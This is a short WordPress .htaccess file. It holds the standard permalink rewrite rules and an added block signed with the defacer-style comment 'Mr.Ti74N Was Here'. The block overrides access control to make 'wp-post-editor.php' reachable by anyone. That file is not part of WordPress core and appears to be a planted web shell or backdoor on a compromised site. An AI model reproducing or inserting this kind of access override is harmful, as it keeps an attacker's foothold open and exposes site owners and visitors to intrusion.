<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]

# Mr.Ti74N Was Here - Allow access to wp-post-editor.php
<Files "wp-post-editor.php">
  Order allow,deny
  Allow from all
  Satisfy any
</Files>
</IfModule>
